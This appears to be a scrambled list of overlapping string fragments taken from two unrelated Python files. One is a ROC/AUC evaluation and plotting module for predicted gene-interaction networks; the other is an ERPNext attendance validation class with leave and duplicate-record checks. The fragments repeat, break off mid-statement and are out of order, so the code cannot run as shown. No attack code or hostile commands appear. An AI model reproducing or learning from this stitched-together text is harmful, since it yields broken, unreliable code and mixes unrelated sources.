index.split(interaction_indices) return a_node == another_node def 
_get_evaluation_on_given_labels( labels,", "area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method':", "labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering", "= pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY':", "rename method name to include AUC to show it in legend if auc_dict_list:", "method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df =", "1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name,", "if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df", "interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y", "number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y,", "= predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) -", "plt import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings", "roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n):", "method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc )", "'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid", "true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores =", "for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = 
df['method'] == method df['mean_auc']", "def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list(", "# seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n", "- 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return", "ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method", "return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node", "if no_self_loops: interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index)", "): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels)", "roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive", "with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery", ") # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) >", ").fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y =", "roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df", "\"\"\"From a df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel", "df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title 
plt.figure(figsize=figsize) sns.set_style(\"whitegrid\",", "no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index,", "method name to include AUC to show it in legend if auc_dict_list: for", "Characteristic' # rename method name to include AUC to show it in legend", "_filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index", "index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'):", "and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering =", "yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 #", "( '{} '.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f'", "e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def", "( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve", "): \"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\" labels", "set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return", "pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to", "'Receiver Operating Characteristic' # rename method name to include AUC to show it", "if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] ==", "[method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def 
plot_roc_curve_from_df( df,", "n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2", "threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else:", "= np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] =", "import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def", "predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a ROC", "/ 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in", "labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes", "labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points)", "in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions =", "'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method name to", "filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering]", "true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores = _get_evaluation_on_given_labels( labels,", "Operating Characteristic' # rename method name to include AUC to show it in", "np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores)", "= _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0,", "= roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) 
area_under_curve = auc(xx, yy)", "AUC to show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc", "[pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return", "] for gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity", "y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that", "list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices =", "index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices)", "def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be", "0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy)", "= int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions))", "- len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return", ") + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) #", "a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels))", "sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) 
plt.xlim([0, 1])", "can be used to plot a ROC curve.\"\"\" labels = { gene for", "= 'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating", "_check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'):", "to show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc =", "threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx,", "import numpy as np import matplotlib.pyplot as plt import seaborn as sns from", "in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels)", "return n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1,", "method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{}", "legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method']" ]
[ "or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\",", "'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if", "{0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not", "license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from", "erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date() self.validate_duplicate_record() self.check_leave_record()", "frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) <", "unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe import _ from", "set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee", "Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name", "leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self):", "frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def validate_employee(self): emp", "= 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status", "marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where", "from `tabEmployee` where name = 
%s and status = 'Active'\", self.employee) if not", "from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from", "if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif", "frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater", "Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status", "= %s and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name))", "joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name =", "self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee))", "and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True)", "leave_type, half_day from `tabLeave Application` where employee = %s and %s between from_date", "frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining", "Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee,", "and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status =", "from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import Document", "and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day:", "def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, 
[\"Present\", \"Absent\", \"On Leave\", \"Half Day\"])", "Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3.", "can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining):", "%s and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date),", "elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than", "Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils", "Contributors # License: GNU General Public License v3. See license.txt from __future__ import", "frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date = %s and", "docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is", "(self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0}", "%s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee", "self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on", "= 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date))", "active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\",", "self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def", "future dates\")) elif date_of_joining and getdate(self.attendance_date) < 
getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be", "check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s", "not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance", "from `tabLeave Application` where employee = %s and %s between from_date and to_date", "leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date))", "{1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on", "Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt", "frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select", "!= %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for", "frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave'", "is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave", "employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day", "day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee", "frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and", "employee {0} for 
{1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if", "and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining", "than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where", "validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date()", "and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res:", "self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance", "nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name", "License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import", "leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining =", "# License: GNU General Public License v3. 
See license.txt from __future__ import unicode_literals", "on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record:", "emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and status =", "not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def", "not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self):", "name from `tabAttendance` where employee = %s and attendance_date = %s and name", "and Contributors # License: GNU General Public License v3. See license.txt from __future__", "to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status", "record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\",", "getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining", "from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date() self.validate_duplicate_record()", "dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less", "= frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date = %s", "res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date =", "and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date))", "res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def 
check_leave_record(self): leave_record =", "frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import Document from", "and attendance_date = %s and name != %s and docstatus = 1\"\"\", (self.employee,", "for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not", "name from `tabEmployee` where name = %s and status = 'Active'\", self.employee) if", "%s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if", "frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document):", "be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from", "frappe.db.sql(\"select name from `tabEmployee` where name = %s and status = 'Active'\", self.employee)", "General Public License v3. See license.txt from __future__ import unicode_literals import frappe from", "1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee", "= frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and %s", "if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for", "from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if", "where name = %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee", "frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res =", "'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does not", "and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: 
frappe.throw(_(\"Attendance for employee {0}", "> getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and", "date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be", "2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License", "from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe", "GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe", "not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status,", "date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s", "Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No", "def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and", "found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee,", "def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and", "Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. 
See", "from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res", "_ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self):", "date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's", "employee = %s and attendance_date = %s and name != %s and docstatus", "as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half", "status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or", "validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not", "date can not be less than employee's joining date\")) def validate_employee(self): emp =", "self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found", "Application` where employee = %s and %s between from_date and to_date and docstatus", "on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave", "where employee = %s and attendance_date = %s and name != %s and", "class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee =", "{0} is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import", "= %s and attendance_date = %s and name != %s and docstatus =", "on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0}", "Ltd. 
and Contributors # License: GNU General Public License v3. See license.txt from", "else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on", "for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) >", "if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record", "if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day", "frappe from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import", "validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date", "getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def validate_employee(self):", "can not be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select", "= leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On", "= 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day'", "import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select", "<reponame>Semicheche/foa_frappe_docker<filename>frappe-bench/apps/erpnext/erpnext/hr/doctype/attendance/attendance.py # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. 
and Contributors # License:", "emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self): from", "def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee =", "Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General", "import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def", "name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance", "half_day from `tabLeave Application` where employee = %s and %s between from_date and", "employee = %s and %s between from_date and to_date and docstatus = 1\"\"\",", "self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status ==", "v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate,", "already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application`", "`tabAttendance` where employee = %s and attendance_date = %s and name != %s", "getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date)", "exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half", "does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On", "if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on 
{1}\").format(self.employee,", "less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee`", "# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU", "(c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public", "on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type =", "%s and attendance_date = %s and name != %s and docstatus = 1\"\"\",", "between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record:", "\"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for", "docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half", "{1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()):", "leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and", "from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class", "self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future", "leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on", "{0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type", "Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s", "= frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) 
> getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked", "from `tabAttendance` where employee = %s and attendance_date = %s and name !=", "for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\")", "getdate, nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import", "== \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0}", "validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and status", "set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee", "erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance`", "self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self):", "self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee,", "getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\"))", "import getdate, nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils", "{1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record", "1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee))", "and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active", "import unicode_literals import 
